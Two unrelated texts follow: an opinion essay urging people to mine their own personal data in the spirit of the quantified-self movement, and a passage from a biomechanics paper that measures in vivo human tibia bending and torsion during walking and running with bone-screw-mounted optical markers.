From the dawn of civilisation until 2003, Eric Schmidt is fond of saying, humankind generated five exabytes of data. Now we produce five exabytes every two days — and the pace is accelerating. In our post-privacy world of pervasive social-media sharing, GPS tracking, cellphone-tower triangulation, wireless sensor monitoring, browser-cookie targeting, face-recognition detecting, consumer-intention profiling, and endless other means by which our personal presence is logged in databases far beyond our reach, citizens are largely failing to benefit from the power of all this data to help them make smarter decisions. It's time to reclaim the concept of data mining from the marketing industry's microtargeting of consumers, the credit-card companies' anti-fraud profiling, the intrusive surveillance of state-sponsored Total Information Awareness. We need to think more about mining our own output to extract patterns that turn our raw personal datastream into predictive, actionable information. All of us would benefit if the idea of personal data mining were to enter popular discourse.
Microsoft saw the potential back in September 2006, when it filed United States Patent application number 20,080,082,393 for a system of "personal data mining". Having been fed personal data provided by users themselves or gathered by third parties, the technology would then analyse it to "enable identification of opportunities and/or provisioning of recommendations to increase user productivity and/or improve quality of life". You can decide for yourself whether you trust Redmond with your lifelog, but it's hard to fault the premise: the personal data mine, the patent states, would be a way "to identify relevant information that otherwise would likely remain undiscovered".
Both I as a citizen and society as a whole would gain if individuals' personal datastreams could be mined to extract patterns upon which we could act. Such mining would turn my raw data into predictive information that can anticipate my mood and improve my efficiency, make me healthier and more emotionally intuitive, reveal my scholastic weaknesses and my creative strengths. I want to find the hidden meanings, the unexpected correlations that reveal trends and risk factors of which I had been unaware. In an era of oversharing, we need to think more about data-driven self-discovery.
A small but fast-growing self-tracking movement is already showing the potential of such thinking, inspired by Kevin Kelly's quantified self and Gary Wolf's data-driven life. With its mobile sensors and apps and visualisations, this movement is tracking and measuring exercise, sleep, alertness, productivity, pharmaceutical responses, DNA, heartbeat, diet, financial expenditure — and then sharing and displaying its findings for greater collective understanding. It is using its tools for clustering, classifying and discovering rules in raw data, but mostly is simply quantifying that data to extract signals — information — from the noise.
The cumulative rewards of such thinking will be altruistic rather than narcissistic, whether in pooling personal data for greater scientific understanding (23andMe) or in propagating user-submitted data to motivate behaviour change in others (Traineo). Indeed, as the work of Daniel Kahneman, Daniel Gilbert, and Christakis and Fowler demonstrate so powerfully, accurate individual-level data-tracking is key to understanding how human happiness can be quantified, how our social networks affect our behaviour, how diseases spread through groups.
The data is already out there. We just need to encourage people to tap it, share it, and corral it into knowledge.
|
{
"pile_set_name": "OpenWebText2"
}
|
Introduction {#s1}
============
Evidence suggests that both the geometry and thus the mechanical properties of long bones adapt to the mechanical load they are exposed to [@pone.0094525-Main1]--[@pone.0094525-Schulte1]. In the absence of an easy way to assess *in vivo* mechanical loads acting on bones, bone geometry, which is deemed to be causally related to its loading history, has been taken to predict the *in vivo* bone loading history [@pone.0094525-Augat1], [@pone.0094525-Capozza1]. For instance, by analyzing a stack of peripheral quantitative computed tomography (pQCT) images taken across the human tibia, it was concluded that the almost circular distal tibia seems to be adapted to compressive loading patterns, while the non-circular geometry of the proximal tibia is the result of increased torsion and bending [@pone.0094525-Capozza1]. However, there are several problems with this approach [@pone.0094525-Lieberman1]. These include a lack of absolute values of cross-sectional geometric properties and a potential misalignment between the loading history and bone cross-sectional geometry [@pone.0094525-Lieberman1]. It is obvious, and not only therefore, that accurate measurements of real-world *in vivo* bone loading patterns are needed.
Obtaining the information of the bone loading patterns is very important to better understand bone\'s mechano-adaptation, as bone responds differently to different deformation patterns, *e.g.* to torsion or compression [@pone.0094525-Rubin1]. Evidence also suggests that bone formation varies between anatomical sites due to the uneven local strain distribution and deformation patterns, as illustrated across the loaded ulna in rats [@pone.0094525-Kotha1]. Likewise, bending load, rather than local pressure, was capable of creating substantial periosteal mineral apposition in rats [@pone.0094525-RaabCullen1]. Moreover, understanding *in vivo* bone deformation is clinically relevant, in particular in relation to fatigue fracture. For example, *ex vivo* evidence suggests that mixed-mode loading is associated with greater bone fragility than uniaxial loading [@pone.0094525-George1]. Similarly, changing the loading mode from pure compression to a combination of torsional and compressive loading facilitates propagation of microcracks within the bone [@pone.0094525-Wang1], and bones are relatively stronger when loaded by habitual load patterns than when exposed to novel loading regimes [@pone.0094525-Reilly1].
The *in vivo* bone deformation data currently available in literature mainly originates from studies that have used surgically implanted strain gauges. As noted previously, at least three strain gauges have to be attached around the long bone shaft to determine the neutral axis of bending and compute bending load or deformation. For most species, including humans, this operation is not feasible without affecting their regular muscle functions [@pone.0094525-Lieberman1], [@pone.0094525-Yang1].
Harold Frost\'s mechanostat theory explains the functional adaptation capability of bone to mechanical stimulation [@pone.0094525-Frost1]. However, it is still under debate which loading parameters in terms of deformation type, amplitude, repetition cycles and frequency, are most effective for bone adaptation [@pone.0094525-Huiskes1]. Furthermore, the major sources of force, as well as the deformation modes required to effectively maintain or regulate bone structure and metabolism, remain unclear. Bending moments have been approximated in mammals, *e.g.* horse, dog and goat, using paired strains gauges from opposite surfaces of bones, in cases where limb motion is mainly in the parasagittal plane [@pone.0094525-Rubin1], [@pone.0094525-Biewener1]--[@pone.0094525-Gross1]. A series of classic studies on the bones of the lower extremities of animals in the 1980 s suggested that bending is occurring during different locomotor activities. This was demonstrated when strain gauge measurements showed that the anterior aspect of bone is under tension while the posterior aspect is under compression [@pone.0094525-Biewener1], [@pone.0094525-Biewener2], [@pone.0094525-Biewener3]--[@pone.0094525-Rubin3]. Recent studies in animal [@pone.0094525-Gross1] and human models [@pone.0094525-Aamodt1]--[@pone.0094525-Macdonald1] suggest that bending is the primary component of long bone loading. The fact that most long bones are slightly curvatured also supports the idea that bending is notable, and that it may be enhanced by muscle contractions and the off-axis orientation of the bone to the center of body mass [@pone.0094525-Bertram1]. Furthermore, it has been speculated that the bone curvature is designed to improve the predictability of the bone load during different locomotor activities, since a curved bone is more likely to be bent than a straight bone [@pone.0094525-Bertram1]. Furthermore, studies have shown a shift of the bending neutral axis of long bones from the certroidal axis of the cross sectional area, indicating that long bones do indeed bend while experiencing axial loading [@pone.0094525-Gross1], [@pone.0094525-Judex1]. In addition, it was shown that the bone loading pattern changes throughout the stance phase of the gait cycle and varies with speed [@pone.0094525-Szivek1]--[@pone.0094525-Demes2]. The underlying cause will be that muscles attached to bone change their moment with joint movement. For example, most muscle groups in the human shank insert into the posterior aspect of tibia or fibula ([Figure 1A](#pone-0094525-g001){ref-type="fig"}). Although these muscles work against poor lever arms, they still generate very large flexion moments [@pone.0094525-Wehner1], [@pone.0094525-Heinlein1].
{#pone-0094525-g001}
It is unclear in how far bending moments might be minimized by muscular contractions. Such contractions could protect the bone material and especially the long bones from bending stress accumulation, and therefore reduce fracture risks [@pone.0094525-Sverdlova1]--[@pone.0094525-Pauwels1]. Muscle forces are thought by some to convert potential bending stress generated by reaction forces to compressive loading, which is less harmful for bone to tolerate [@pone.0094525-Currey1]. An *in vivo* tibia strain study in humans seems to support the opinion. Milgrom *et al.* compared strain data in humans in fatigued and non-fatigued status [@pone.0094525-Milgrom1]. The tensional strain of the antero-medial aspect of the tibia clearly increased when the gastrocnemius muscles were fatigue indicating that regular muscle activities might be crucial to maintain regular bone strains [@pone.0094525-Milgrom1].
However, as noted above, one can apply paired or more gauges only where opposing sides of the bone are free of muscle insertions. Such an anatomical site is not available in any of large human long bones. To our knowledge, the *in vivo* bone loading patterns in humans during daily activities remains unknown.
In comparison to bending, the role of torsion on bone mechanical adaptation has received little to no attention. Several classic studies have demonstrated that the strain gradient is highly correlated with periosteal bone formation on different sites [@pone.0094525-Judex1], [@pone.0094525-Gross2]. If this holds true, then torsional loading would not be a crucial factor for periosteal bone formation, as torsional loading is only capable of generating relative small strain gradients for a near cylinder shaped long bone, compared to bending load. Contradictorily, some studies suggested that different constituents of the loading environment, namely axial loading and torsional loading, play a distinct role in regulating bone formation and structure [@pone.0094525-Rubin1], [@pone.0094525-Guo1]. These studies indicated that torsional loading might be one of the essential components of the entire bone loading regimes. Likewise, it was found that torsion dominates mechanical loading of the femur and tibiotarsus of the emu during running and gait [@pone.0094525-Main2]. Of note, torsion seems to be the main determinant of the design of long bones in birds [@pone.0094525-Judex1], [@pone.0094525-Main2]--[@pone.0094525-Swartz1]. To date, there is no salient evidence to suggest a strong role for torsion in the design of human long bones. One would intuitively assume that torsion is the driving loading pattern to maintain the almost circular cross-sectional geometry of long hollow bones [@pone.0094525-Feldman1], as torsion is capable of producing similar bone matrix deformation all along the circumference in different sites of the long bone. Results from an *in vivo* knee joint loading study indicated that the tibia-femur contact torsion moment was relatively small, with the normalized peak value (normalized by body weight times length) ranging from 0.53 to 1.1 [@pone.0094525-Kutzner1]. However, considering the low capability of bone to resist torsional loading, we hypothesize that the human tibia may experience considerable torsional loading during walking and running.
Therefore, the goal of the present study was to use a novel optical segment tracking (OST) approach to investigate, for the first time, the *in vivo* human tibia loading regimes in terms of the tibia segment deformation regimes, including tibia antero-posterior (AP), medio-lateral bending angles (ML), torsion angles during most common locomotor activities for humans on the ground, *e.g.* walking and running. Furthermore, the relationship between the speed of walking and running, ground reaction force, moment and tibia deformation was assessed.
Material and Methods {#s2}
====================
Five healthy male subjects (26--50 years old) were recruited to participate in this study. They were free of any muscle or joint injuries and had not undergone orthopedic surgery in the lower extremities within twelve months prior to the study.
1.1 Ethics statement {#s2a}
--------------------
Written and oral explanation of the purposes, benefits and risks of the study procedure were given to the subjects at least 3 days before they signed the consent forms. The subjects have given written informed consent, as outlined in the PLOS consent form, to the publication of their photograph. This study has been approved by the two relevant Ethics Committees, namely the ethical committee of the North-Rhine Medical Board in Düsseldorf and the ethical committee of the Faculty of Medicine in the University of Cologne. The operations and experiments were performed at the Department of Orthopedic and Trauma Surgery of the University Hospital of Cologne.
1.2 OST approach for tibia segment deformation measurements {#s2b}
-----------------------------------------------------------
A novel OST approach recently developed in our lab [@pone.0094525-Yang2] has been adopted for tibia segment deformation recording in this study. Briefly, three mono-cortical bone screws were partially implanted into the anterior-medial aspect of the tibial cortex ([Figure 2A--B](#pone-0094525-g002){ref-type="fig"}). A marker cluster with a set of three non-collinear retro-reflective markers (Ø5 mm, Géodésie Maintenance Services, Nort Sur Erdre, France, [Figure 2C](#pone-0094525-g002){ref-type="fig"}) was mounted on each bone screw. The trajectories of the marker clusters were captured at 300 Hz by a Vicon MX optical motion capture system with eight Vicon F40 cameras (Vicon Motion System Ltd., LA, USA) ([Figure 2A](#pone-0094525-g002){ref-type="fig"}). In order to optimize resolution, accuracy and precision, the optical system used in this study included even more cameras than the previous validation study. The optical system was configured in line with our recent recommendations [@pone.0094525-Yang2]. Specifications from our previous publication were followed, *i.e.*, positioning the cameras and adjusting the appropriate capture volume and the optimal distance between cameras and the tibia-affixed markers. It can therefore be taken as granted that the performance of the optical system was as good as in the mock-up study. This means that a resolution better than 20 µm within the capture volume of 400×300×300 mm^3^ was achieved. The maximal absolute error was 1.8 µm during displacements by 20 µm and repeatability was 2.5 µm. A detailed error analysis was performed in order to estimate absolute distance recording errors as a function of bending angle errors (see [Discussion](#s4){ref-type="sec"}). Prior to the *in vivo* experiments, an *ex vivo* study on measuring tibia segment deformation under artificial loading in six cadaveric specimens has shown the fair repeatability and the feasibility of the OST approach (unpublished data). Briefly, the variance between the repeated tibia segment deformation measurements using the OST approach was assessed, whilst the cadaveric tibia was loaded by simulated muscle forces with a custom-made static loading device. Results suggested that the standard deviation of the mean bending and torsion deformation angles remains at a low level, from 0° to 0.04° for different loading conditions, indicating its potential to be applied *in vivo*. During the *in vivo* study, the stability of the bone screws in the tibial cortex was assessed by testing the resonance frequency of the screw-cluster structure and the relative position between the marker clusters prior to and after the exercises. It was shown to remain constant at ∼260 Hz and ∼380 Hz. The small location drift between the marker clusters during the course of the experimentation, which was maximally 0.06°, indicates that the implantation of the bone screws was extremely stable. The good toleration to the OST approach by the subjects also indicated its applicability for the *in vivo* measurements (See [Results](#s3){ref-type="sec"}).
{#pone-0094525-g002}
In order to identify the tibia anatomical landmarks, general retro-reflective markers (Ø16 mm, Vicon Motion System Ltd., LA, USA) were attached on the skin over the medial and lateral malleolus, the tibia tuberosity and over the head of the fibula. Prior to each trial of the activities, the trajectories of skin-attached markers were recorded simultaneously with tibia-affixed markers for 1--2 seconds while the shank was in a static position and free of any loading. This static trial allowed the generation of the Shank Anatomical Coordinate System (SACS) required for data analysis. Tibia segment deformation was expressed as the relative movement between the tibia-affixed marker clusters in the SACS.
1.3 Surgical technique {#s2c}
----------------------
Surgical implantation and explantation of the bone screws was performed under local anesthesia by injecting Xylocain 1% and Carbostesin 0.5% into the skin and the periosteum of the right shank of each subject. Prior to the operation, Ibuprofen (600 mg) and Cefuroxime (1500 mg) was administered to reduce pain perception and the risk of infection. The thickness of the tibial cortex was determined from transverse MRI (Magnetic Resonance Imaging, 1.5 T, Philips, Best, The Netherlands) images of the shank. To prevent intrusion into the bone marrow, the sites for screw implantation were selected so that the thickness of the tibial cortex was thicker than 4 mm. Thus, screws were implanted at approximately 10 cm below the tibia plateau, in the middle of the tibia diaphysis and at approximately 10 cm above the tibia medial malleolus.
Surgical incisions of approximately 1 cm length were made into the skin. A drill guide and a 2.1 mm diameter drill (Stryker Leibinger GmbH & Co. KG, Germany) were used to drill three holes into the tibial cortex to a depth of 2.5 mm. Bone screws (Asnis Micro cannulated titanium screws, Ø3 mm, 24/6 mm, Stryker Leibinger GmbH & Co. KG, Germany) were implanted with a dedicated screw driver. At the end of the experiment, *i.e.* between 6 and 8 hours later, bone screws were removed. Further details of the surgical procedure were described in another paper [@pone.0094525-Ganse1].
1.4 Investigated locomotor activities {#s2d}
-------------------------------------
All of the subjects wore gymnastic shoes during the experiments. Members of staff familiarized with the experimental procedure once a week during 6 months preceding the study, and study subjects underwent preparatory training during at least one day prior to the actual experiments in order to be fully acquainted with the protocol. During the practice training, the experimental protocol was followed closely to help the test subjects to be mentally well prepared for the *in vivo* experiments -- the exception being that bone screws were installed into a shin pad above the shank instead of into the tibia. Testing included the most common locomotor activities during daily life: (1) walking on a walkway with a force plate embedded at self-selected slow, free and fast speed, respectively ([Figure 2A](#pone-0094525-g002){ref-type="fig"}); (2) walking at 2.5, 3.5, 4.5 and 5.5 km/h on a treadmill (Schiller MTM-1500 med, h/p/cosmos sports & medical GmbH, Germany); (3) running at 5.5 and 9 km/h on a treadmill (Two test subjects participated in the running test at 9 km/h). At least three repetitions have been performed at each speed of walking on the walkway, and a minimum of sixteen complete walking or running cycles were recorded on the treadmill, respectively.
1.5 Assessment of speed and ground reaction forces during walking {#s2e}
-----------------------------------------------------------------
A second, independent motion capturing system with ten Bonita cameras (Vicon Motion System Ltd., LA, USA) was installed for the assessment of whole-body movement. Two general retro-reflective markers (Ø16 mm, Vicon Motion System Ltd., LA, USA) were attached to the skin of the left and right posterior superior iliac spine (PSIS). The trajectories of these two markers were sampled at 100 Hz for all subjects. Ground reaction forces during walking on the walkway were recorded at 1000 Hz with a force plate system (AMTI OR6-5, Watertown, MA, USA). The two motion capturing systems were synchronized by an external trigger.
1.6 Peripheral quantitative computed tomography (pQCT) imaging {#s2f}
--------------------------------------------------------------
Horizontal pQCT scans of the tibia on the sites of screw implantation were obtained one to three days after screw removal with a XCT3000 (Stratec Medizintechnik, Pforzheim, Germany) to document the screw holes and geometry of the tibia cross section area for further calculations ([Figure 2D](#pone-0094525-g002){ref-type="fig"}).
1.7 Data analysis {#s2g}
-----------------
Raw marker trajectory data and ground reaction forces were further processed with custom-written MATLAB routines (The MathWorks, Inc. Version 7.9.0 R2009b). The raw marker trajectory data for tibia segment deformation recording was filtered using a 10-point moving average filter. Ground reaction force data was low-pass filtered using a 2^nd^ order, zero lag Butterworth filter with cut-off frequency at 15 Hz.
### 1.7.1 Determination of SACS, tibia bending and torsion angles {#s2g1}
For each subject, a randomly selected frame acquired during the static trial was utilized to determine an initial Cartesian SACS from the skin-attached tibia landmarks. In the SACS, X, Y and Z axes indicate the anterior-posterior, proximal-distal and medial-lateral direction, respectively [@pone.0094525-Grood1]. The coordinates of the marker clusters implanted into the tibia were then subjected to coordinate transformation [@pone.0094525-Soderkvist1], [@pone.0094525-Lafortune1] to yield tibia segment deformation within the SACS. Differences between the relative position of each two sets of marker clusters in the SACS were then calculated and expressed as mean ± standard deviation (SD) of three Cardan/Euler angles and three translations along the axes of SACS, respectively. As the anterior-medial aspect of the tibia is free of muscle insertions, the effect of bone tissue inhomogeneity on anterior-medial tibia surface deformations was assumed to be negligible. AP bending angle, ML bending angle and inter-external torsion angle derived from Cardan/Euler angles were reported as tibia segment deformation. In the following, the relative movement of the proximal tibia-markers will be presented in relation to distal tibia-markers. Thus, AP bending ([Figure 1B](#pone-0094525-g001){ref-type="fig"}), ML bending and internal-external torsion ([Figure 1C](#pone-0094525-g001){ref-type="fig"}) always indicate the bending and torsion of the proximal tibia with respect to the distal tibia ([Figure 1](#pone-0094525-g001){ref-type="fig"}).
### 1.7.2 Calculation of the ground reaction force {#s2g2}
Vertical ground reaction force (VGRF) during walking was derived from the filtered ground reaction force data. In general, there are two noticeable peaks for the VGRF during walking. These two peak values of VGRF were automatically identified and used for further analysis. Vertical Free moment (VFM) is the torque which acts about the vertical axis through the center of pressure of the ground reaction force. By subtracting the AP moment and the ML moment from the total transverse ground reaction moment, VFM about the vertical axis through the center of pressure of the force plate was determined. The details on the moment calculation can be referred to the 'Instruction Manual\' of the AMTI Company [@pone.0094525-UO1]. VGRF was normalized to body weight (unit: N). VFM was normalized to the product of body weight (unit: N) and foot length (unit: m).
### 1.7.3 Calculation of walking speed on the walkway {#s2g3}
During walking trials on the walkway, the coordinates of the mid-point of two PSIS markers in global transverse plane were extracted from the filtered total trajectories data. The average walking speed of the subjects was determined as the moving distance of the mid-point of two PSIS markers divided by time over the stance phase of the right leg on the force plate.
1.8 Statistics {#s2h}
--------------
Statistical analyses were performed using R statistic software (version 2.15.1, R Development Core Team, 2012). Least-squares linear regression was performed to determine the correlation between the tibia segment deformation angles and the moving speed, as well as VGRF or VFM for individual subjects. The 95% confidence interval for the slope was calculated. Furthermore, a one-way ANOVA linear model was employed to examine the main effects of subject, moving speed and the type of activity on the tibia segment deformation angles. Within-subject effects due to moving speed were assessed with the error analyses in an ANOVA linear model. Furthermore, considering that the sample size in the present study was limited, nonparametric tests were also adopted to assess the potential influence of small sample size on the statistical results. In particular, the correlation between tibia segment deformation angles, moving speed and VGRF or VFM for each individual subject was determined with Spearman\'s rank correlation rho (corresponding to Least-squares Linear regression in parametric tests). The effects of locomotor speed and the type of activity on tibia segment deformation angles during treadmill exercises were assessed with Friedman test or Wilcoxon Mann-Whitney test (corresponding to one-way ANOVA and t-test). Statistical significance was accepted at *p*≤0.05.
Results {#s3}
=======
Pain questionnaires (Visual analog scale form 0 to 10 indicating no pain to intolerable pain) were handed out during the *in vivo* experiments. All subjects report 0 during walking and running [@pone.0094525-Ganse1], indicating that the potential influence of pain caused by the bone screws and the wound on the motion is minimized. The bone screws were firmly inserted into the tibia until the end of the experiments. Statistical analysis suggested that there is no fundamental difference between parametric and nonparametric analysis. The details can be found in the following sections. The results in the corresponding figures were thus presented based on the parametric analysis.
1.1 Walking on the walkway with force plate embedded {#s3a}
----------------------------------------------------
A typical example of the tibia segment deformation angle during a stance phase of the gait cycle is presented in [Figure 3](#pone-0094525-g003){ref-type="fig"}. As the overground walking speed was not strictly controlled from subject to subject and computed after the experiments, the results in [Figures 4](#pone-0094525-g004){ref-type="fig"}--[6](#pone-0094525-g006){ref-type="fig"} provide all data on an individual basis. During the stance phase, there were generally posterior bending, external torsion and medial bending of the proximal tibia relative to the distal tibia, with posterior bending being most pronounced during the first half, and torsion being predominant during the second half of the stance phase.
{#pone-0094525-g003}
{#pone-0094525-g004}
{#pone-0094525-g005}
{#pone-0094525-g006}
### 1.1.1 Tibia segment deformation versus walking speed {#s3a1}
Statistical analysis yielded main effects of the test subject on the deformation angles (*p* = 0.02 and r^2^ = 0.57 for tibia AP bending, *p*\<0.001 and r^2^ = 0.09 for tibia torsion, *p*\<0.001 and r^2^ = 0.03 for tibia ML bending). There were no significant within-subjects effects due to walking speed (*p* = 0.36 for tibia AP bending, *p* = 0.07 for tibia torsion, *p* = 0.1 for tibia ML bending). Therefore, the nonparametric and parametric statistic correlation analysis between deformation angles and walking speed was done separately for the individual test subjects ([Figure 4](#pone-0094525-g004){ref-type="fig"}). For all test subjects, the peak-to-peak AP bending angle linearly increased with walking speed. Peak-to-peak AP bending angles varied from 0.15° to 1.30° at the speed of 2.5 - 6.1 km/h. The slope of the regression line ranged from 0.17 to 0.32 with r-squared values between 0.70 and 0.96 ([Figure 4A](#pone-0094525-g004){ref-type="fig"}). Significant correlations between peak-to-peak tibia torsion angles and the speed were found in three out of five test subjects. The peak-to-peak tibia torsion angle varied between 0.67° and 1.66° at walking speed of 2.5--6.1 km/h ([Figure 4B](#pone-0094525-g004){ref-type="fig"}). By contrast, peak-to-peak ML bending angles were rather small, within 0.38°--0.90°, and were mostly un-related to walking speed, except for test subject B ([Figure 4C](#pone-0094525-g004){ref-type="fig"}). The linear regression results are summarized in [Table 1](#pone-0094525-t001){ref-type="table"}. Nonparametric statistical analysis (Spearman\'s rank correlation) yielded the similar correlation results to the parametric analysis between tibia bending angles and walking speed. The results were summarized in [Table 2](#pone-0094525-t002){ref-type="table"}.
10.1371/journal.pone.0094525.t001
###### Least-squares linear regression statistics for tibia bending angles versus walking speed.
{#pone-0094525-t001-1}
Subject Deformation b~1~ (degree[\*](#nt102){ref-type="table-fn"}h/km) a~1~ (degree) r^2^ *p* value N
--------- ------------- ---------------------------------------------------- --------------- ---------- ----------- ----
A AP Bending 0.21[\*\*\*](#nt104){ref-type="table-fn"} −0.33 0.82 \<0.001 16
Torsion 0.05 1.02 0.16 0.12
ML Bending 7.57e-4 0.72 9.90e-05 0.97
B AP Bending 0.17[\*\*\*](#nt104){ref-type="table-fn"} −0.19 0.92 \<0.001 9
Torsion 0.08[\*\*](#nt103){ref-type="table-fn"} 0.94 0.68 0.006
ML Bending 0.03[\*](#nt102){ref-type="table-fn"} 0.40 0.56 0.02
C AP Bending 0.23[\*\*\*](#nt104){ref-type="table-fn"} −0.52 0.96 \<0.001 10
Torsion 0.19[\*\*\*](#nt104){ref-type="table-fn"} 0.18 0.85 \<0.001
ML Bending 0.04 0.28 0.36 0.07
D AP Bending 0.32[\*\*\*](#nt104){ref-type="table-fn"} −0.58 0.82 \<0.001 13
Torsion 0.08[\*\*\*](#nt104){ref-type="table-fn"} 1.19 0.71 \<0.001
ML Bending 0.05 0.49 0.19 0.14
E AP Bending 0.19[\*\*](#nt103){ref-type="table-fn"} 0.07 0.70 0.0027 10
Torsion 0.01 1.39 0.01 0.80
ML Bending −0.03 0.67 0.07 0.46
The linear model used in the statistics is: y~1~ = b~1~ \* x~1~+a~1~ (y~1~ indicates the tibia bending angles, x~1~ indicates walking speed, 95% Confident interval).
\*: *p*\<0.05,
\*\*: *p*\<0.01,
\*\*\*: *p*\<0.001.
10.1371/journal.pone.0094525.t002
###### Nonparametric statistical analysis for tibia bending angles versus walking speed.
{#pone-0094525-t002-2}
Subject Deformation r~s~ *p* value N
--------- ------------- ------------------------------------------- ----------- ----
A AP Bending 0.77[\*\*\*](#nt108){ref-type="table-fn"} \<0.001 16
Torsion −0.38 0.14
ML Bending −0.22 0.42
B AP Bending 0.88[\*\*](#nt107){ref-type="table-fn"} 0.003 9
Torsion −0.73[\*](#nt106){ref-type="table-fn"} 0.03
ML Bending −0.76[\*](#nt106){ref-type="table-fn"} 0.02
C AP Bending 0.98[\*\*\*](#nt108){ref-type="table-fn"} \<0.001 10
Torsion −0.77[\*\*](#nt107){ref-type="table-fn"} 0.0098
ML Bending −0.41 0.24
D AP Bending 0.78[\*\*](#nt107){ref-type="table-fn"} 0.002 13
Torsion −0.74[\*\*](#nt107){ref-type="table-fn"} 0.004
ML Bending −0.40 0.17
E AP Bending 0.82[\*\*](#nt107){ref-type="table-fn"} 0.004 10
Torsion −0.006 1
ML Bending 0.15 0.68
The coefficient of correlation (r~s~) and level of significance (*p*) were yielded.
\*: *p*\<0.05,
\*\*: *p*\<0.01,
\*\*\*: *p*\<0.001.
### 1.1.2 Tibia segment deformation versus ground reaction force {#s3a2}
Regression analysis suggests that the tibia peak-to-peak AP bending angle increased linearly (*p*\<0.001) with the peak VGRF during the first half stance phase, with the slope of the regression line ranging between 1.99 degree\*h/km and 2.56 degree\*h/km (r^2^: 0.77--0.97, [Figure 5A](#pone-0094525-g005){ref-type="fig"}). By contrast, there was no such relationship between peak-to-peak torsion angle and peak VGRF during the second half of the stance phase, except for subject C (*p*\<0.001, r^2^ = 0.94, [Figure 5B](#pone-0094525-g005){ref-type="fig"}).
VFM but not VGRF was correlated with peak-to-peak torsion angles in four test subjects, except subject A (*p* = 0.056, r^2^ = 0.22, [Figure 5C](#pone-0094525-g005){ref-type="fig"}).
The linear regression results are summarized in [Table 3](#pone-0094525-t003){ref-type="table"}. Similar correlation trends between the tibia bending angles and walking speed were found using nonparametric statistical analysis. The Spearman\'s rank correlation results are summarized in [Table 4](#pone-0094525-t004){ref-type="table"}.
10.1371/journal.pone.0094525.t003
###### Least-squares linear regression statistics for tibia deformation angles versus VGRF and VFM.
{#pone-0094525-t003-3}
Subject Deformation angles b~3~ (degree[\*](#nt110){ref-type="table-fn"}h/km) a~3~ (degree) r^2^ *p* value N
--------- ------------------------ ---------------------------------------------------- --------------- ------ ----------- ----
A AP Bending *v.s.* VGRF 1.91[\*\*\*](#nt112){ref-type="table-fn"} −1.75 0.91 \<0.001 16
Torsion *v.s.* VGRF 1.34 −0.17 0.24 0.054
Torsion *v.s.* VFM 11.97 1.07 0.25 0.056
B AP Bending *v.s.* VGRF 1.56[\*\*\*](#nt112){ref-type="table-fn"} −1.18 0.97 \<0.001 9
Torsion *v.s.* VGRF 1.02 0.16 0.11 0.38
Torsion *v.s.* VFM 28.43[\*](#nt110){ref-type="table-fn"} 0.60 0.51 0.046
C AP Bending *v.s.* VGRF 2.99[\*\*\*](#nt112){ref-type="table-fn"} −2.74 0.77 \<0.001 10
Torsion *v.s.* VGRF 3.67[\*\*\*](#nt112){ref-type="table-fn"} −3.03 0.94 \<0.001
Torsion *v.s.* VFM 34.91[\*\*](#nt111){ref-type="table-fn"} 0.33 0.66 0.008
D AP Bending *v.s.* VGRF 2.57[\*\*\*](#nt112){ref-type="table-fn"} −2.16 0.97 \<0.001 13
Torsion *v.s.* VGRF 0.85 0.59 0.21 0.11
Torsion *v.s.* VFM 10.71[\*\*](#nt111){ref-type="table-fn"} 1.31 0.42 0.003
E AP Bending *v.s.* VGRF 2.90[\*\*\*](#nt112){ref-type="table-fn"} −2.04 0.84 \<0.001 10
Torsion *v.s.* VGRF 1.05 0.33 0.08 0.43
Torsion *v.s.* VFM 16.52[\*](#nt110){ref-type="table-fn"} 1.10 0.47 0.04
The linear model used in the statistics is: y~3~ = b~3~ \* x~3~+a~3~ (y~3~ indicates the tibia deformation angles, x~3~ indicates vertical ground reaction force or vertical free moment, 95% Confident interval).
\*: *p*\<0.05,
\*\*: *p*\<0.01,
\*\*\*: *p*\<0.001.
10.1371/journal.pone.0094525.t004
###### Nonparametric statistical analysis for tibia bending angles versus VGRF and VFM.
{#pone-0094525-t004-4}
Subject Deformation angles r~s~ *p* value N
--------- ------------------------ ------------------------------------------- ----------- ----
A AP Bending *v.s.* VGRF 0.96[\*\*\*](#nt116){ref-type="table-fn"} \<0.001 16
Torsion *v.s.* VGRF −0.53[\*](#nt114){ref-type="table-fn"} 0.04
Torsion *v.s.* VFM −0.52[\*](#nt114){ref-type="table-fn"} 0.04
B AP Bending *v.s.* VGRF 0.85[\*\*](#nt115){ref-type="table-fn"} 0.003 9
Torsion *v.s.* VGRF −0.23 0.55
Torsion *v.s.* VFM −0.89[\*](#nt114){ref-type="table-fn"} 0.012
C AP Bending *v.s.* VGRF 0.78[\*\*](#nt115){ref-type="table-fn"} 0.007 10
Torsion *v.s.* VGRF 0.92[\*\*\*](#nt116){ref-type="table-fn"} \<0.001
Torsion *v.s.* VFM −0.81[\*\*](#nt115){ref-type="table-fn"} 0.008
D AP Bending *v.s.* VGRF 0.96[\*\*\*](#nt116){ref-type="table-fn"} \<0.001 13
Torsion *v.s.* VGRF −0.41 0.17
Torsion *v.s.* VFM −0.78[\*\*](#nt115){ref-type="table-fn"} 0.002
E AP Bending *v.s.* VGRF 0.91[\*\*\*](#nt116){ref-type="table-fn"} \<0.001 10
Torsion *v.s.* VGRF −0.16 0.66
Torsion *v.s.* VFM −0.42 0.27
The coefficient of correlation (r~s~) and level of significance (*p*) were yielded accordingly.
\*: *p*\<0.05,
\*\*: *p*\<0.01,
\*\*\*: *p*\<0.001.
1.2 Walking and running on a treadmill {#s3b}
--------------------------------------
During treadmill walking, significant main effects of the test subjects on the AP bending angle (*p*\<0.001, r^2^ = 0.89), torsion angle (*p*\<0.001, r^2^ = 0.85) and ML bending angle (*p* = 0.0046, r^2^ = 0.62) were found. Within-subjects effects of walking speed were not found (*p* = 0.24 for tibia AP bending, *p* = 0.37 for tibia torsion, *p* = 0.16 for tibia ML bending). Therefore, and as above, the deformation results are presented on the basis of the individual test subject ([Figure 6](#pone-0094525-g006){ref-type="fig"}). The AP bending angle increased with walking speed (posterior bending angles: from 0.23°±0.03° to 0.90°±0.22°, *p*\<0.001) and running speed (posterior bending angles: from 1.07°±0.11° to 2.15°±0.27°, *p*\<0.001). At the same speed, running induced a larger AP bending angle than walking ([Figure 6A](#pone-0094525-g006){ref-type="fig"}, *p*\<0.001). No main effects of speed were found on tibia torsion during treadmill walking (external torsion angles: from 0.86°±0.10° to 1.85°±0.15 °, *p* = 0.067). Interestingly, for four test subjects, it seems that tibia torsion during running is lower than that during walking ([Figure 6B](#pone-0094525-g006){ref-type="fig"}, *p* = 0.048). During walking and running on the treadmill, ML bending, compared to bending deformation, occurred on somewhat low levels and was almost constant across speeds. One exception was that a larger ML bending angle was generated during running at 9 km/h than during 